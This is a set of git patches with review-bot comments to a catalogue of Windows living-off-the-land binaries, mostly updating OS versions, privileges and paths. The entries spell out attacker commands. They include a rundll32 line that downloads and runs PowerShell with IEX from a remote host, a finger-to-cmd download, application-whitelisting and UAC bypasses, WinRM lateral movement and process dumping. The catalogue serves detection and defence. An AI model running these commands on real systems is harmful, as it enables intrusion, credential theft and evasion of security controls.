diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index bc2aa44..0b0e529 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -8,19 +8,19 @@ Commands: Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute - Privileges: Local Admin + Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL bypass - Privileges: Local Admin + Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\regsvcs.exe - - Path: C:\Windows\SysWOW64\regsvcs.exe + - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 568f322..59365e9 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml 
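Review bot: The two new Full_Path lines use a lowercase drive letter (`c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe`), whereas the other .NET-hosted binaries touched in this series spell out `C:\Windows\Microsoft.NET\...` (Vbc.yml, Dfsvc.yml). Windows paths are case-insensitive, but tooling that string-matches this field across entries is not, so `C:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe` and `C:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe` would keep the set uniform. The `v*` wildcard itself has precedent in Pester.yml (`Pester\*\bin\Pester.bat`), so that part seems fine.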
@@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Usecase: Execute code from Internet Category: Execute diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 47d177f..a8bee1a 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml 
@@ -5,19 +5,19 @@ Author: Lior Adar Created: 2020-02-27 Commands: - Command: vbc.exe /target:exe c:\temp\vbs\run.vb - Description: Binary file used by .NET to compile vb code to .exe + Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb - Description: Description of the second command - Usecase: A description of the usecase + Description: Binary file used by .NET to compile Visual Basic code to an executable. + Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index b1b8b54..d49557f 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -4,7 +4,7 @@ Description: Used by Windows to execute scripts Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: wscript c:\ads\file.txt:script.vbs + - Command: wscript //e:vbscript c:\ads\file.txt:script.vbs Description: Execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 082ce3b..96e5dcc 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml 
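Review bot: Full_Path for vbc.exe lists only the `Framework64` directories while the commit extends OperatingSystem to `Windows 7, Windows 10, Windows 11` without adding the 32-bit location; I believe `C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe` ships alongside the 64-bit copy, and Regsvcs.yml in this same patch lists both `Framework` and `Framework64`. Detection derived from Full_Path would miss a compile launched from the 32-bit directory, so please confirm and add `- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe` (and the `v3.5` counterpart). The Full_Path block sits on context lines, so this is outside what the hunk itself changes.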
@@ -19,7 +19,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. + Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. Usecase: Download file from Internet Category: Download Privileges: User diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 8ee42f4..b015321 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -15,7 +15,7 @@ Commands: Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: User + Privileges: Admin MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index ca4dd14..631c1f1 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml 
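Review bot: The new Xwizard Description mixes path separators and punctuation: `...INetCache\<8_RANDOM_ALNUM_CHARS>/[1].` switches to a forward slash before `[1]` and ends with a period, so a reader cannot tell whether `[1].` is part of the cached file name or the end of the sentence. Suggest writing both locations with backslashes throughout, e.g. `%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>\` and `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>\`, and stating the file-name pattern once in words, since this text is what defenders copy into hunting notes.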
@@ -10,35 +10,35 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: User + Privileges: Admin MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index bfd4dee..e94f6b2 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml 
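Review bot: The two `LaunchINFSection` entries in this hunk now disagree on privileges: the first (whose tail is visible as context) keeps `Privileges: User` while the `c:\test.inf,,1,` variant is raised to `Privileges: Admin`, with no change to its Description explaining why the same export needs elevation in one form but not the other. If the difference is real (for instance the second form's INF writing to protected locations), a sentence in Description such as `Requires elevation when the INF section writes to system locations.` would stop readers from treating it as a typo; if not, the two values should match. The Advpack.yml hunk above makes the same User→Admin change for its `LaunchINFSection` entry and the same question applies there.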
@@ -4,7 +4,7 @@ Description: Windows Shell Common Dll Author: Created: 2018-05-25 Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll + - Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. Usecase: Load a DLL payload. Category: Execute diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 85da874..1fdea2a 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 587242c..d5e07b3 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml 
@@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 023d4e7..c108ab3 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -11,11 +11,11 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' + - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute - Privileges: User + Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' From e51caad3dd524efe75566e704f8aecb37c565461 Mon Sep 17 00:00:00 2001 
From: Wietze Date: Tue, 14 Dec 2021 16:57:56 +0000 Subject: [PATCH 04/11] Adding Windows 11 reference to missed-out executables --- yml/OSBinaries/Pktmon.yml | 4 ++-- yml/OSBinaries/Pnputil.yml | 4 ++-- yml/OSBinaries/Ttdinject.yml | 4 ++-- yml/OSBinaries/Tttracer.yml | 4 ++-- 4 files changed, 8 insertions(+), 8 deletions(-) diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 77fd42b..50030de 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -10,14 +10,14 @@ Commands: Category: Reconnaissance Privileges: Administrator MitreID: T1040 - OperatingSystem: Windows 10 1809 and later + OperatingSystem: Windows 10 1809 and later, Windows 11 - Command: pktmon.exe filter add -p 445 Description: Select Desired ports for packet capture Usecase: Look for interesting traffic such as telent or FTP Category: Reconnaissance Privileges: Administrator MitreID: T1040 - OperatingSystem: Windows 10 1809 and later + OperatingSystem: Windows 10 1809 and later, Windows 11 Full_Path: - Path: c:\windows\system32\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 512ae99..0ff4fb1 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -10,10 +10,10 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1547 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\system32\pnputil.exe -Code_Sample: +Code_Sample: - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index a1b6052..19fb508 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml 
@@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1127 - OperatingSystem: Windows 10 2004 + OperatingSystem: Windows 10 2004 and above, Windows 11 - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator MitreID: T1127 - OperatingSystem: Windows 10 1909 + OperatingSystem: Windows 10 1909 and below Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index 2e8ee54..fa6a26d 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1127 - OperatingSystem: Windows 10 1809 and newer + OperatingSystem: Windows 10 1809 and newer, Windows 11 - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID Category: Dump Privileges: Administrator MitreID: T1003 - OperatingSystem: Windows 10 1809 and newer + OperatingSystem: Windows 10 1809 and newer, Windows 11 Full_Path: - Path: C:\Windows\System32\tttracer.exe - Path: C:\Windows\SysWOW64\tttracer.exe From 085aaa37b191be00bf0657a1824ef21849d4cc06 Mon Sep 17 00:00:00 2001 
From: Wietze Date: Wed, 15 Dec 2021 11:46:04 +0000 Subject: [PATCH 05/11] Adding more missed-out entries --- yml/OSBinaries/Finger.yml | 62 +++++++-------- .../Microsoft.Workflow.Compiler.yml | 6 +- yml/OSBinaries/Mmc.yml | 2 +- yml/OSBinaries/Schtasks.yml | 4 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/Pcwutl.yml | 2 +- yml/OSLibraries/Setupapi.yml | 2 +- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Syssetup.yml | 4 +- yml/OSLibraries/Url.yml | 12 +-- yml/OSLibraries/Zipfldr.yml | 4 +- yml/OSLibraries/comsvcs.yml | 2 +- yml/OSScripts/CL_LoadAssembly.yml | 48 ++++++------ yml/OSScripts/UtilityFunctions.yml | 48 ++++++------ yml/OtherMSBinaries/Fsi.yml | 78 +++++++++---------- yml/OtherMSBinaries/FsiAnyCpu.yml | 70 ++++++++--------- yml/OtherMSBinaries/Procdump.yml | 68 ++++++++-------- yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 62 +++++++-------- yml/OtherMSBinaries/Wfc.yml | 56 ++++++------- 20 files changed, 268 insertions(+), 268 deletions(-) diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index e84d9d9..279454f 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml 
@@ -1,31 +1,31 @@ ---- -Name: Finger.exe -Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon -Author: Ruben Revuelta -Created: 2021-08-30 -Commands: - - Command: finger user@example.host.com | more +2 | cmd - Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' - Usecase: Download malicious payload - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 -Full_Path: - - Path: c:\windows\system32\finger.exe - - Path: c:\windows\syswow64\finger.exe -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml - - IOC: finger.exe should not be run on a normal workstation. - - IOC: finger.exe connecting to external resources. -Resources: - - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) -Acknowledgement: - - Person: Ruben Revuelta (MAPFRE CERT) - Handle: '@rubn_RB' - - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: '@Ocelotty6669' - - Person: Malwrologist - Handle: '@DissectMalware' ---- +--- +Name: Finger.exe +Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon +Author: Ruben Revuelta +Created: 2021-08-30 +Commands: + - Command: finger user@example.host.com | more +2 | cmd + Description: 'Downloads payload from remote Finger server. 
This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' + Usecase: Download malicious payload + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 +Full_Path: + - Path: c:\windows\system32\finger.exe + - Path: c:\windows\syswow64\finger.exe +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml + - IOC: finger.exe should not be run on a normal workstation. + - IOC: finger.exe connecting to external resources. +Resources: + - Link: https://twitter.com/DissectMalware/status/997340270273409024 + - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +Acknowledgement: + - Person: Ruben Revuelta (MAPFRE CERT) + Handle: '@rubn_RB' + - Person: Jose A. Jimenez (MAPFRE CERT) + Handle: '@Ocelotty6669' + - Person: Malwrologist + Handle: '@DissectMalware' +--- diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d1f884..a2f0382 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml 
@@ -10,21 +10,21 @@ Commands: Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S, Windows 11 - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S, Windows 11 - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: AWL Bypass Privileges: User MitreID: T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 4bf70e8..4f31b21 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -17,7 +17,7 @@ Commands: Category: UAC Bypass Privileges: Administrator MitreID: T1218.014 - OperatingSystem: Windows 10 (and possibly earlier versions) + OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index a176de6..0f6d3d4 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml 
@@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1053.005 - OperatingSystem: Windows + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute Privileges: Administrator MitreID: T1053.005 - OperatingSystem: Windows 10, Windows 11 + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index ba04167..c299470 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 9483c3c..40850c9 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 1f47e38..657ea48 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll 
diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 02264de..3779e7b 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -10,7 +10,7 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. UseCase: Load an executable payload. diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index f344462..2136e6b 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 44a0bb4..078bf0d 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -10,14 +10,14 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index ea34df9..c744c09 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml 
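Review bot: The Setupapi.yml hunk leaves a context line keyed `UseCase:` where every other entry in this series uses `Usecase:`; YAML keys are case-sensitive, so any generator or detection tooling reading `Usecase` will see that field as missing for the `InstallHinfSection DefaultInstall 128` command. Changing it to `Usecase: Load an executable payload.` belongs in this clean-up pass, since the commit already touches the adjacent `OperatingSystem` line.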
@@ -10,42 +10,42 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). 
Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index d64c755..e10a771 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 03596cf..7a9c41b 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -10,7 +10,7 @@ Commands: Category: Dump Privileges: SYSTEM MitreID: T1003.001 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\comsvcs.dll Code_Sample: diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 